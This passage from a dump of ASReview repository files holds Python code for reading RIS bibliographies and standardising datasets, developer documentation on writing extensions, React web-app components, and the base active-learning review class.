"src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport io\nimport logging\nimport re\nfrom urllib.request import urlopen\n\nimport pandas\nimport rispy\n\nfrom asreview.io.utils import _standardize_dataframe\nfrom asreview.utils import is_url\n\n\nclass RISReader:\n \"\"\"RIS file reader.\"\"\"\n\n read_format = [\".ris\", \".txt\"]\n write_format = [\".csv\", \".tsv\", \".xlsx\", \".ris\"]\n\n def _strip_zotero_p_tags(note_list):\n \"\"\"Converter function for removing the XHTML <p></p> tags from Zotero export.\n\n Arguments\n ---------\n note_list: list\n A list of notes, coming from the Dataframe's \"notes\" column.\n\n Returns\n -------\n new_notes: list\n A list of updated notes, where XHTML <p></p> tags have been stripped.\n note_list: list\n The original note_list, when no XHTML <p></p> tags have been found.\n \"\"\"\n if isinstance(note_list, list):\n new_notes = []\n for v in note_list:\n try:\n new_notes.append(re.sub(r\"^<p>|<\\/p>$\", \"\", v))\n except Exception:\n new_notes.append(v)\n return new_notes\n else:\n return note_list\n\n def _label_parser(note_list):\n \"\"\"Parse \"included\" and \"notes\" columns.\n\n Arguments\n ---------\n note_list: list\n A list of notes, coming from the Dataframe's \"notes\" column.\n\n Returns\n -------\n asreview_new_notes: list\n A list of updated notes, where internal label has been added.\n note_list: list\n The original note_list, when no labels have been found.\n 1,0,-1: int\n Labels in case they are still needed from the internal representation.\n \"\"\"\n regex = r\"ASReview_relevant|ASReview_irrelevant|ASReview_not_seen\"\n\n # Check whether note_list is actually a list and not NaN\n # Return -1 and an empty list\n if not isinstance(note_list, list):\n return -1, []\n\n # Create lists of lists for ASReview references\n asreview_refs = [re.findall(regex, note) for note in note_list]\n asreview_refs_list = [item for sublist in asreview_refs for item in sublist]\n\n if len(asreview_refs_list) > 0:\n # Create lists of lists for notes without references\n asreview_new_notes = [re.sub(regex, \"\", note) for note in note_list]\n # Remove empty elements from list\n asreview_new_notes[:] = [item for item in asreview_new_notes if item != \"\"]\n label = asreview_refs_list[-1]\n\n # Check for the label and return proper values for internal representation\n if label == \"ASReview_relevant\":\n return 1, asreview_new_notes\n elif label == \"ASReview_irrelevant\":\n return 0, asreview_new_notes\n elif label == \"ASReview_not_seen\":\n return -1, asreview_new_notes\n else:\n return -1, note_list\n\n @classmethod\n def read_data(cls, fp):\n \"\"\"Import dataset.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n File path to the RIS file.\n note_list: list\n A list of notes, coming from the Dataframe's \"notes\" column.\n\n Returns\n -------\n pandas.DataFrame:\n Dataframe with entries.\n\n Raises\n ------\n ValueError\n File with unrecognized encoding is used as input.\n \"\"\"\n encodings = [\"utf-8\", \"utf-8-sig\", 
\"ISO-8859-1\"]\n entries = None\n if entries is None:\n if is_url(fp):\n url_input = urlopen(fp)\n for encoding in encodings:\n if is_url(fp):\n try:\n bibliography_file = io.StringIO(\n url_input.read().decode(encoding)\n )\n\n entries = list(\n rispy.load(bibliography_file, skip_unknown_tags=True)\n )\n bibliography_file.close()\n break\n except UnicodeDecodeError:\n pass\n else:\n try:\n with open(fp, \"r\", encoding=encoding) as bibliography_file:\n entries = list(\n rispy.load(bibliography_file, skip_unknown_tags=True)\n )\n break\n except UnicodeDecodeError:\n pass\n except IOError as e:\n logging.warning(e)\n if entries is None:\n raise ValueError(\"Cannot find proper encoding for data file.\")\n\n # Turn the entries dictionary into a Pandas dataframe\n df = pandas.DataFrame(entries)\n\n # Check if \"notes\" column is present\n if \"notes\" in df:\n # Strip Zotero XHTML <p> tags on \"notes\"\n df[\"notes\"] = df[\"notes\"].apply(cls._strip_zotero_p_tags)\n # Split \"included\" from \"notes\"\n df[[\"included\", \"notes\"]] = pandas.DataFrame(\n df[\"notes\"].apply(cls._label_parser).tolist(),\n columns=[\"included\", \"notes\"],\n )\n # Return the standardised dataframe with label and notes separated\n return _standardize_dataframe(df)\n else:\n # Return the standardised dataframe\n return _standardize_dataframe(df)\n" }, { "alpha_fraction": 0.6854776740074158, "alphanum_fraction": 0.6862444281578064, "avg_line_length": 32.270408630371094, "blob_id": "21e049a661a343e7420602c07c580e2d035d31bf", "content_id": "07637d8e3a72223b43f016f1b9dc6afa3f8ee923", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6843, "license_type": "permissive", "max_line_length": 91, "num_lines": 196, "path": "/docs/source/extensions_dev.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": ".. _develop-extensions:\n\nCreate extensions\n=================\n\nASReview extensions enable you to integrate your programs with the ASReview\nframework seamlessly, by using the Python API. These extensions fall into three\ndifferent categories, and interact with the API in different ways.\n\n1. `Model extensions`_\n2. `Subcommand extensions`_\n3. `Dataset extensions`_\n\nThe extensibility of the framework is provided by the entrypoints of\nsetuptools. You will need to create a package and install it (for example with\npip).\n\nDid you develop a useful extension to ASReview and want to list it on\n:ref:`extensions-community`? Create a Pull Request or open an issue on\n`GitHub <https://github.com/asreview/asreview/issues>`__.\n\nFor more information on the ASReview API for creating an extension, a technical\nreference for development is found under the :ref:`API reference<api_ref>`. This\ntechnical reference contains functions for use in your extension, and an\noverview of all classes to extend on.\n\n\nModel Extensions\n----------------\nAn extension of a :class:`asreview.models.base.BaseModel` type class.\n\nModel extensions extent the ASReview software with new classifiers, query\nstrategies, balance strategies, or feature extraction techniques. 
These\nextensions extend one of the model base classes\n(:class:`asreview.models.balance.base`,\n:class:`asreview.models.classifiers.base`,\n:class:`asreview.models.feature_extraction.base`,\n:class:`asreview.models.query.base`).\n\nThe easiest way to extend ASReview with a model is by using the |template_link|.\nCreate a copy of the template and add the new algorithm to a new model file. It\nis advised to use the following structure of the package:\n\n.. code:: bash\n\n    ├── README.md\n    ├── asreviewcontrib\n    │   └── models\n    │       ├── classifiers\n    │       │   ├── __init__.py\n    │       │   └── example_model.py\n    │       ├── feature_extraction\n    │       │   ├── __init__.py\n    │       │   └── example_feature_extraction.py\n    │       ├── balance\n    │       │   ├── __init__.py\n    │       │   └── example_balance_strategies.py\n    │       └── query\n    │           ├── __init__.py\n    │           └── example_query_strategies.py\n    ├── setup.py\n    └── tests\n\nThe next step is to add metadata to the `setup.py\n<https://github.com/asreview/template-extension-new-model/blob/main/setup.py>`__\nfile. Edit the ``name`` of the package and point the ``entry_points`` to the\nmodels.\n\n.. code:: python\n\n    entry_points={\n        'asreview.models.classifiers': [\n            'example = asreviewcontrib.models.classifiers.example_model:ExampleClassifier',\n        ],\n        'asreview.models.feature_extraction': [\n            # define feature_extraction algorithms\n        ],\n        'asreview.models.balance': [\n            # define balance_strategy algorithms\n        ],\n        'asreview.models.query': [\n            # define query_strategy algorithms\n        ]\n    },\n\nThis code registers the model with name ``example``.\n\n.. |template_link| raw:: html\n\n    <a href=\"https://github.com/asreview/template-extension-new-model\"\n    target=\"_blank\"> template for extending ASReview</a>\n\nSubcommand Extensions\n---------------------\nAn extension of the :class:`asreview.entry_points.base.BaseEntryPoint` class.\n\nSubcommand extensions are programs that create a new entry point for ASReview.\nFrom this entry point the Python API can be used in many ways (like ``plot`` or\n``simulate``).\n\nExtensions in ASReview are Python packages and can extend the subcommands of\nasreview (see ``asreview -h``). An example of a subcommand extension is\n`ASReview Insights <https://github.com/asreview/asreview-insights>`_.\n\nThe easiest way to create a new subcommand is by defining a class that can be\nused as a new entry point for ASReview. This class should inherit from\n:class:`asreview.entry_points.base.BaseEntryPoint`. Add the functionality to the\nclass method ``execute``.\n\n.. code:: python\n\n    from asreview.entry_points import BaseEntryPoint\n\n    class ExampleEntryPoint(BaseEntryPoint):\n\n        description = \"Description of example extension\"\n        extension_name = \"asreview-example\"  # Name of the extension\n        version = \"1.0\"  # Version of the extension in x.y(.z) format.\n\n        def execute(self, argv):\n            pass  # Implement your functionality here.\n\nIt is strongly recommended to define the attributes ``description``,\n``extension_name``, and ``version``.\n\nThe class method ``execute`` accepts a positional argument (``argv`` in this\nexample). First create the functionality you would like to be able to use in\nany directory. The argument ``argv`` contains the command line arguments left after\nremoving asreview and the entry point.\n\nIt is advised to place the newly defined class ``ExampleEntryPoint`` in the\nfollowing package structure:\n``asreviewcontrib.{extension_name}.{your_modules}``. For example:\n\n.. code:: bash\n\n    ├── README.md\n    ├── asreviewcontrib\n    │   └── example\n    │       ├── __init__.py\n    │       ├── entrypoint.py\n    │       └── example_utils.py\n    ├── setup.py\n    └── tests\n\n\nCreate a ``setup.py`` in\nthe root of the package, and set the keyword argument ``entry_points`` of\n``setup()`` under ``asreview.entry_points``, for example:\n\n.. code:: python\n\n    entry_points={\n        \"asreview.entry_points\": [\n            \"example = asreviewcontrib.example.entrypoint:ExampleEntryPoint\",\n        ]\n    }\n\nAfter installing this package, ASReview is extended with the ``asreview\nexample`` subcommand. See ``asreview -h`` for this option.\n\n\nDataset Extensions\n------------------\nAn extension of the :class:`asreview.datasets.BaseDataSet` class.\n\nDataset extensions integrate new datasets for use in ASReview. Adding datasets\nvia extension provides quick access to the dataset via Command Line Interface or in\nASReview LAB.\n\nIt is advised to place the new dataset ``your_dataset`` in the\nfollowing package structure:\n\n.. code:: bash\n\n    ├── README.md\n    ├── asreviewcontrib\n    │   └── dataset_name\n    │       ├── __init__.py\n    │       └── your_dataset.py\n    ├── data\n    │   └── your_dataset.csv\n    ├── setup.py\n    └── tests\n\nFor minimal functionality, ``your_dataset.py`` should extend\n:class:`asreview.datasets.BaseDataSet` and\n:class:`asreview.datasets.BaseDataGroup`.\n\nA working template to clone and use can be found at `Template for extending\nASReview with a new dataset\n<https://github.com/asreview/template-extension-new-dataset>`_.\n\n\nFurther functionality can be\nadded by extending any other class in :mod:`asreview.datasets`.\n" }, { "alpha_fraction": 0.5002501010894775, "alphanum_fraction": 0.5042521357536316, "avg_line_length": 21.97701072692871, "blob_id": "495515110c42f124908675f51dfa957fb74d4d9b", "content_id": "21cdad47e640bf15f5e632b015035f21b9679d86", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1999, "license_type": "permissive", "max_line_length": 91, "num_lines": 87, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/NoteSheet.js", "repo_name": "terrymyc/asreview", 
note by labeling the record as relevant or irrelevant\"\n multiline\n onChange={handleNote}\n placeholder=\"Write something...\"\n rows={4}\n value={props.note ? props.note : \"\"}\n variant=\"outlined\"\n />\n </Box>\n </Stack>\n </CardContent>\n </Card>\n </Root>\n );\n};\n\nexport default NoteSheet;\n" }, { "alpha_fraction": 0.6193403005599976, "alphanum_fraction": 0.6214392781257629, "avg_line_length": 28.910314559936523, "blob_id": "1f3260243be809c8d9fb10202892eb59052e551f", "content_id": "f7dcec431cbe920312939d941b4cea68768d226f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6670, "license_type": "permissive", "max_line_length": 86, "num_lines": 223, "path": "/asreview/io/utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom asreview.config import COLUMN_DEFINITIONS\nfrom asreview.config import LABEL_NA\nfrom asreview.exceptions import BadFileFormatError\nfrom asreview.utils import _entry_points\n\n\ndef type_from_column(col_name, col_definitions):\n \"\"\"Transform a column name to its standardized form.\n\n Arguments\n ---------\n col_name: str\n Name of the column in the dataframe.\n col_definitions: dict\n Dictionary of {standardized_name: [list of possible names]}.\n Ex. {\"title\": [\"title\", \"primary_title\"],\n \"authors\": [\"authors\", \"author names\", \"first_authors\"]}\n\n Returns\n -------\n str:\n The standardized name. If it wasn't found, return None.\n \"\"\"\n for name, definition in col_definitions.items():\n if col_name.lower() in definition:\n return name\n return None\n\n\ndef convert_keywords(keywords):\n \"\"\"Split keywords separated by commas etc to lists.\"\"\"\n if not isinstance(keywords, str):\n return keywords\n\n current_best = [keywords]\n for splitter in [\", \", \"; \", \": \", \";\", \":\"]:\n new_split = keywords.split(splitter)\n if len(new_split) > len(current_best):\n current_best = new_split\n return current_best\n\n\ndef _is_record_id_unique(s):\n if len(pd.unique(s)) != len(s.index):\n raise ValueError(\"Column 'record_id' contains duplicate values.\")\n\n\ndef _is_record_id_notnull(s):\n if s.isnull().any():\n raise ValueError(\"Column 'record_id' contains missing values.\")\n\n\ndef _is_record_id_int(s):\n try:\n pd.to_numeric(s).astype(int)\n except Exception:\n raise ValueError(\"Column 'record_id' should contain integer values.\")\n\n\ndef _standardize_dataframe(df, column_def={}):\n \"\"\"Create a ASReview readable dataframe.\n\n The main purpose is to rename columns with slightly different names;\n 'authors' vs 'first_authors', etc. 
This greatly widens the compatibility\n with different datasets.\n\n Arguments\n ---------\n df: pandas.DataFrame\n Unclean dataframe to be cleaned up.\n\n Returns\n -------\n pd.DataFrame:\n Cleaned dataframe with proper column names.\n \"\"\"\n all_column_spec = {}\n\n # remove whitespace from colnames\n df.columns = df.columns.str.strip()\n\n # map columns on column specification\n col_names = list(df)\n for column_name in col_names:\n # First try the custom column definitions if supplied.\n data_type = type_from_column(column_name, column_def)\n if data_type is not None:\n all_column_spec[data_type] = column_name\n continue\n # Then try the standard specifications in ASReview.\n data_type = type_from_column(column_name, COLUMN_DEFINITIONS)\n if data_type is not None:\n all_column_spec[data_type] = column_name\n\n # Check if we either have abstracts or titles.\n col_names = list(all_column_spec)\n if \"abstract\" not in col_names and \"title\" not in col_names:\n raise BadFileFormatError(\n \"File supplied without 'abstract' or 'title'\" \" fields.\"\n )\n if \"abstract\" not in col_names:\n logging.warning(\"Unable to detect abstracts in dataset.\")\n if \"title\" not in col_names:\n logging.warning(\"Unable to detect titles in dataset.\")\n\n # Replace NA values with empty strings.\n for col in [\"title\", \"abstract\", \"authors\", \"keywords\", \"notes\"]:\n try:\n df[all_column_spec[col]] = np.where(\n pd.isnull(df[all_column_spec[col]]),\n \"\",\n df[all_column_spec[col]].astype(str),\n )\n except KeyError:\n pass\n\n # Convert labels to integers.\n if \"included\" in col_names:\n try:\n col = all_column_spec[\"included\"]\n df[col].fillna(LABEL_NA, inplace=True)\n df[col] = pd.to_numeric(df[col])\n except KeyError:\n pass\n except ValueError:\n logging.warning(\n \"Failed to parse label column name, no labels will\" \" be present.\"\n )\n df.rename(columns={\"label\": \"included\"})\n all_column_spec.pop(\"included\")\n\n # TODO: Make sure 'record_id' column in original dataset does not get overwritten.\n # # If the we have a record_id (for example from an ASReview export) use it.\n # if \"record_id\" in list(df):\n #\n # # validate record_id column\n # _is_record_id_notnull(df[\"record_id\"])\n # _is_record_id_unique(df[\"record_id\"])\n # _is_record_id_int(df[\"record_id\"])\n #\n # # Create a new index if we haven't found it in the data.\n # else:\n # df[\"record_id\"] = np.arange(len(df.index))\n df[\"record_id\"] = np.arange(len(df.index)).astype('int64')\n\n # set the index\n df.set_index(\"record_id\", inplace=True)\n\n return df, all_column_spec\n\n\ndef list_readers():\n \"\"\"List available dataset reader classes.\n\n Returns\n -------\n list:\n Classes of available dataset readers in alphabetical order.\n \"\"\"\n return [e.load() for e in _entry_points(group=\"asreview.readers\")]\n\n\ndef list_writers():\n \"\"\"List available dataset writer classes.\n\n Returns\n -------\n list:\n Classes of available dataset writers in alphabetical order.\n \"\"\"\n return [e.load() for e in _entry_points(group=\"asreview.writers\")]\n\n\ndef get_reader_class(name):\n \"\"\"Get class of dataset reader from string.\n\n Arguments\n ---------\n name: str\n Name of the dataset reader, e.g. 
'.csv', '.tsv' or '.xlsx'.\n\n Returns\n -------\n class:\n Class corresponding to the name.\n \"\"\"\n return _entry_points(group=\"asreview.readers\")[name].load()\n\n\ndef get_writer_class(name):\n \"\"\"Get class of dataset writer from string.\n\n Arguments\n ---------\n name: str\n Name of the dataset writer, e.g. '.csv', '.tsv' or '.xlsx'.\n\n Returns\n -------\n class:\n Class corresponding to the name.\n \"\"\"\n\n return _entry_points(group=\"asreview.writers\")[name].load()\n" }, { "alpha_fraction": 0.580632209777832, "alphanum_fraction": 0.5834449529647827, "avg_line_length": 29.349594116210938, "blob_id": "0f25adcda46fa4847d3210a59272901bf00c758e", "content_id": "94eb7f37ccd774e7201a928c94f9a8725e7dd78f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7466, "license_type": "permissive", "max_line_length": 80, "num_lines": 246, "path": "/asreview/webapp/src/App.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { QueryClient, QueryClientProvider } from \"react-query\";\nimport { useSelector, useDispatch } from \"react-redux\";\nimport { Routes, Route } from \"react-router-dom\";\nimport \"typeface-roboto\";\nimport { Box, CssBaseline, createTheme, useMediaQuery } from \"@mui/material\";\nimport CircularProgress from \"@mui/material/CircularProgress\";\nimport { ThemeProvider, StyledEngineProvider } from \"@mui/material/styles\";\nimport \"./App.css\";\n\nimport { BaseAPI } from \"./api/index.js\";\nimport { setBootData, setOAuthServices } from \"./redux/actions\";\n\nimport {\n ConfirmAccount,\n ForgotPassword,\n HelpDialog,\n NavigationDrawer,\n RequireAuth,\n PersistSignIn,\n ResetPassword,\n SettingsDialog,\n SignIn,\n SignInOAuthCallback,\n SignUpForm,\n} from \"./Components\";\nimport { HomePage } from \"./HomeComponents\";\nimport { ProjectPage } from \"./ProjectComponents\";\nimport {\n useDarkMode,\n useFontSize,\n useKeyPressEnabled,\n useUndoEnabled,\n} from \"./hooks/SettingsHooks\";\nimport { useToggle } from \"./hooks/useToggle\";\n\n// Ensure that on localhost we use 'localhost' instead of '127.0.0.1'\nconst currentDomain = window.location.href;\nif (currentDomain.includes(\"127.0.0.1\")) {\n let newDomain = currentDomain.replace(\"127.0.0.1\", \"localhost\");\n window.location.replace(newDomain);\n}\n\nconst queryClient = new QueryClient();\n\nconst App = (props) => {\n // state related stuff for booting the app\n const [appReady, setAppReadyState] = React.useState(false);\n const dispatch = useDispatch();\n const authentication = useSelector((state) => state.authentication);\n const allowAccountCreation = useSelector(\n (state) => state.allow_account_creation,\n );\n const emailVerification = useSelector((state) => state.email_verification);\n\n // Dialog state\n const [onSettings, toggleSettings] = useToggle();\n const [onProjectSetup, toggleProjectSetup] = useToggle();\n const [projectCheck, setProjectCheck] = React.useState({\n open: false,\n issue: null,\n path: \"/projects\",\n project_id: null,\n });\n\n // Settings hook\n const [theme, toggleDarkMode] = useDarkMode();\n const [fontSize, handleFontSizeChange] = useFontSize();\n const [undoEnabled, toggleUndoEnabled] = useUndoEnabled();\n const [keyPressEnabled, toggleKeyPressEnabled] = useKeyPressEnabled();\n\n const muiTheme = createTheme(theme);\n const mobileScreen = useMediaQuery(muiTheme.breakpoints.down(\"md\"), {\n noSsr: true,\n });\n\n // Navigation drawer state\n 
const [onNavDrawer, toggleNavDrawer] = useToggle(mobileScreen ? false : true);\n\n // This effect does a boot request to gather information\n // from the backend\n React.useEffect(() => {\n BaseAPI.boot({})\n .then((response) => {\n dispatch(setBootData(response));\n // set oauth services if there are any\n if (response?.oauth) {\n dispatch(setOAuthServices(response.oauth));\n }\n })\n .catch((err) => {\n console.log(err);\n });\n }, [dispatch]);\n\n // This effect makes sure we handle routing at the\n // moment we know for sure if there is, or isn't authentication.\n React.useEffect(() => {\n if (\n authentication !== undefined &&\n allowAccountCreation !== undefined &&\n emailVerification !== undefined\n ) {\n setAppReadyState(true);\n } else {\n setAppReadyState(false);\n }\n }, [authentication, allowAccountCreation, emailVerification]);\n\n const render_sign_routes = () => {\n return (\n <>\n {allowAccountCreation && (\n <Route\n path=\"/signup\"\n element={<SignUpForm mobileScreen={mobileScreen} />}\n />\n )}\n <Route\n path=\"/signin\"\n element={<SignIn mobileScreen={mobileScreen} />}\n />\n <Route\n path=\"/oauth_callback\"\n element={<SignInOAuthCallback mobileScreen={mobileScreen} />}\n />\n <Route\n path=\"/forgot_password\"\n element={<ForgotPassword mobileScreen={mobileScreen} />}\n />\n <Route path=\"/confirm_account\" element={<ConfirmAccount />} />\n <Route\n path=\"/reset_password\"\n element={<ResetPassword mobileScreen={mobileScreen} />}\n />\n {emailVerification && (\n <Route\n path=\"/confirm_account\"\n element={<SignUpForm mobileScreen={mobileScreen} />}\n />\n )}\n </>\n );\n };\n\n const render_routes = () => {\n return (\n <>\n {/* Public or Private routes, depending on authentication */}\n <Route\n path=\"*\"\n element={\n <RequireAuth enforce_authentication={authentication}>\n <NavigationDrawer\n mobileScreen={mobileScreen}\n onNavDrawer={onNavDrawer}\n toggleNavDrawer={toggleNavDrawer}\n toggleSettings={toggleSettings}\n />\n </RequireAuth>\n }\n >\n <Route\n path=\"*\"\n element={\n <HomePage\n mobileScreen={mobileScreen}\n onNavDrawer={onNavDrawer}\n onProjectSetup={onProjectSetup}\n projectCheck={projectCheck}\n setProjectCheck={setProjectCheck}\n toggleProjectSetup={toggleProjectSetup}\n />\n }\n />\n <Route\n path=\"projects/:project_id/*\"\n element={\n <ProjectPage\n mobileScreen={mobileScreen}\n onNavDrawer={onNavDrawer}\n fontSize={fontSize}\n undoEnabled={undoEnabled}\n keyPressEnabled={keyPressEnabled}\n projectCheck={projectCheck}\n setProjectCheck={setProjectCheck}\n toggleProjectSetup={toggleProjectSetup}\n />\n }\n />\n </Route>\n </>\n );\n };\n\n return (\n <QueryClientProvider client={queryClient}>\n <StyledEngineProvider injectFirst>\n <ThemeProvider theme={muiTheme}>\n <CssBaseline />\n\n <div aria-label=\"nav and main content\">\n {appReady === false && (\n <Box\n display=\"flex\"\n justifyContent=\"center\"\n alignItems=\"center\"\n minHeight=\"100vh\"\n >\n <CircularProgress />\n </Box>\n )}\n {appReady === true && authentication === false && (\n <Routes>{render_routes()}</Routes>\n )}\n\n {appReady === true && authentication === true && (\n <Routes>\n {render_sign_routes()}\n <Route element={<PersistSignIn />}>{render_routes()}</Route>\n </Routes>\n )}\n </div>\n\n {/* Dialogs */}\n <SettingsDialog\n mobileScreen={mobileScreen}\n onSettings={onSettings}\n onDark={theme}\n fontSize={fontSize}\n keyPressEnabled={keyPressEnabled}\n undoEnabled={undoEnabled}\n toggleSettings={toggleSettings}\n toggleDarkMode={toggleDarkMode}\n 
handleFontSizeChange={handleFontSizeChange}\n toggleKeyPressEnabled={toggleKeyPressEnabled}\n toggleUndoEnabled={toggleUndoEnabled}\n />\n <HelpDialog mobileScreen={mobileScreen} />\n </ThemeProvider>\n </StyledEngineProvider>\n </QueryClientProvider>\n );\n};\n\nexport default App;\n" }, { "alpha_fraction": 0.5752878785133362, "alphanum_fraction": 0.5760850310325623, "avg_line_length": 34.391849517822266, "blob_id": "7bcd6abb65aa92b19306e87594d5376df6fbdc98", "content_id": "82927403926ffa82557bf60ed9e27d9024872a0e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11290, "license_type": "permissive", "max_line_length": 88, "num_lines": 319, "path": "/asreview/review/base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import logging\nfrom abc import ABC\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom asreview.config import DEFAULT_N_INSTANCES\nfrom asreview.config import LABEL_NA\nfrom asreview.models.balance.simple import SimpleBalance\nfrom asreview.models.classifiers import NaiveBayesClassifier\nfrom asreview.models.feature_extraction.tfidf import Tfidf\nfrom asreview.models.query.max import MaxQuery\nfrom asreview.project import open_state\nfrom asreview.settings import ASReviewSettings\n\n\nclass BaseReview(ABC):\n \"\"\"Base class for Systematic Review.\n\n Arguments\n ---------\n as_data: asreview.ASReviewData\n The data object which contains the text, labels, etc.\n project: path-like\n Path to the project file.\n model: BaseTrainClassifier\n Initialized model to fit the data during active learning.\n See asreview.models.utils.py for possible models.\n query_model: BaseQueryStrategy\n Initialized model to query new instances for review, such as random\n sampling or max sampling.\n See asreview.query_strategies.utils.py for query models.\n balance_model: BaseBalance\n Initialized model to redistribute the training data during the\n active learning process. They might either resample or undersample\n specific papers.\n feature_model: BaseFeatureExtraction\n Feature extraction model that converts texts and keywords to\n feature matrices.\n n_instances: int\n Number of papers to query at each step in the active learning\n process.\n stop_if: int\n Number of steps/queries to perform. Set to None for no limit.\n start_idx: numpy.ndarray\n Start the simulation/review with these indices. They are assumed to\n be already labeled. 
Failing to do so might result in bad behaviour.\n    \"\"\"\n\n    def __init__(\n        self,\n        as_data,\n        project,\n        model=NaiveBayesClassifier(),\n        query_model=MaxQuery(),\n        balance_model=SimpleBalance(),\n        feature_model=Tfidf(),\n        n_papers=None,\n        n_instances=DEFAULT_N_INSTANCES,\n        stop_if=None,\n        start_idx=[],\n    ):\n        \"\"\"Initialize the reviewer base class, so that everything is ready to\n        train a new model.\"\"\"\n        super(BaseReview, self).__init__()\n\n        # Set the model.\n        self.classifier = model\n        self.balance_model = balance_model\n        self.query_strategy = query_model\n        self.feature_extraction = feature_model\n\n        # Set the settings.\n        self.as_data = as_data\n        self.project = project\n        self.n_instances = n_instances\n        self.stop_if = stop_if\n        self.prior_indices = start_idx\n\n        if n_papers is not None:\n            logging.warning(\"Argument n_papers is deprecated, ignoring n_papers.\")\n\n        # Get the known labels.\n        self.data_labels = as_data.labels\n        if self.data_labels is None:\n            self.data_labels = np.full(len(as_data), LABEL_NA)\n\n        with open_state(self.project, read_only=False) as state:\n            # If the state is empty, add the settings.\n            if state.is_empty():\n                state.settings = self.settings\n\n            # Add the record table to the state if it is not already there.\n            self.record_table = state.get_record_table()\n            if self.record_table.empty:\n                state.add_record_table(as_data.record_ids)\n                self.record_table = state.get_record_table()\n\n        # Retrieve feature matrix from the project file or create\n        # one from scratch.\n        try:\n            self.X = self.project.get_feature_matrix(self.feature_extraction.name)\n        except FileNotFoundError:\n            self.X = self.feature_extraction.fit_transform(\n                as_data.texts, as_data.headings, as_data.bodies, as_data.keywords\n            )\n\n            # check if the number of records after the transform equals\n            # the number of records in the dataset\n            if self.X.shape[0] != len(as_data):\n                raise ValueError(\n                    \"Dataset has {} records while feature \"\n                    \"extractor returns {} records\".format(\n                        len(as_data), self.X.shape[0]\n                    )\n                )\n\n            self.project.add_feature_matrix(self.X, self.feature_extraction.name)\n\n        # Check if the number of records in the feature matrix matches the\n        # length of the dataset.\n        if self.X.shape[0] != len(self.data_labels):\n            raise ValueError(\n                \"The state file does not correspond to the \"\n                \"given data file, please use another state \"\n                \"file or dataset.\"\n            )\n\n        # Make sure the priors are labeled.\n        self._label_priors()\n\n    @property\n    def settings(self):\n        \"\"\"Get an ASReview settings object\"\"\"\n        extra_kwargs = {}\n        if hasattr(self, \"n_prior_included\"):\n            extra_kwargs[\"n_prior_included\"] = self.n_prior_included\n        if hasattr(self, \"n_prior_excluded\"):\n            extra_kwargs[\"n_prior_excluded\"] = self.n_prior_excluded\n        return ASReviewSettings(\n            model=self.classifier.name,\n            query_strategy=self.query_strategy.name,\n            balance_strategy=self.balance_model.name,\n            feature_extraction=self.feature_extraction.name,\n            n_instances=self.n_instances,\n            stop_if=self.stop_if,\n            model_param=self.classifier.param,\n            query_param=self.query_strategy.param,\n            balance_param=self.balance_model.param,\n            feature_param=self.feature_extraction.param,\n            **extra_kwargs\n        )\n\n    def review(self):\n        \"\"\"Do a full review.\"\"\"\n        # Label any pending records.\n\n        with open_state(self.project, read_only=False) as s:\n            pending = s.get_pending()\n            if not pending.empty:\n                self._label(pending)\n\n            labels_prior = s.get_labels()\n\n        # progress bars\n        pbar_rel = tqdm(\n            initial=sum(labels_prior),\n            total=sum(self.as_data.labels),\n            desc=\"Relevant records found\",\n        )\n        pbar_total = tqdm(\n            initial=len(labels_prior),\n            total=len(self.as_data),\n            desc=\"Records labeled       \",\n        )\n\n        # While the stopping condition has not been met:\n        while not self._stop_review():\n            # Train a new model.\n            self.train()\n\n            # Query for new records to label.\n            record_ids = self._query(self.n_instances)\n\n            # Label the records.\n            labels = self._label(record_ids)\n\n            # monitor progress here\n            pbar_rel.update(sum(labels))\n            pbar_total.update(len(labels))\n\n        else:\n            # close the progress bars when stopped\n            pbar_rel.close()\n            pbar_total.close()\n\n    def _label_priors(self):\n        \"\"\"Make sure the prior records are labeled.\"\"\"\n        with open_state(self.project, read_only=False) as state:\n            labeled = state.get_labeled()\n            unlabeled_priors = [\n                x for x in self.prior_indices if x not in labeled[\"record_id\"].to_list()\n            ]\n            self._label(unlabeled_priors, prior=True)\n\n    def _stop_review(self):\n        \"\"\"Check if the review should be stopped according to stopping rule\n        obtained from the settings.\n\n        Returns\n        -------\n        bool\n            If True, the stopping criteria have been met.\n        \"\"\"\n        stop = False\n\n        # Get the pool and labeled. There never should be pending papers here.\n        with open_state(self.project) as state:\n            pool, labeled, _ = state.get_pool_labeled_pending()\n\n        # if the pool is empty, always stop\n        if pool.empty:\n            stop = True\n\n        # If stop_if is set to min, stop when all papers in the pool are\n        # irrelevant.\n        if self.stop_if == \"min\" and (self.data_labels[pool] == 0).all():\n            stop 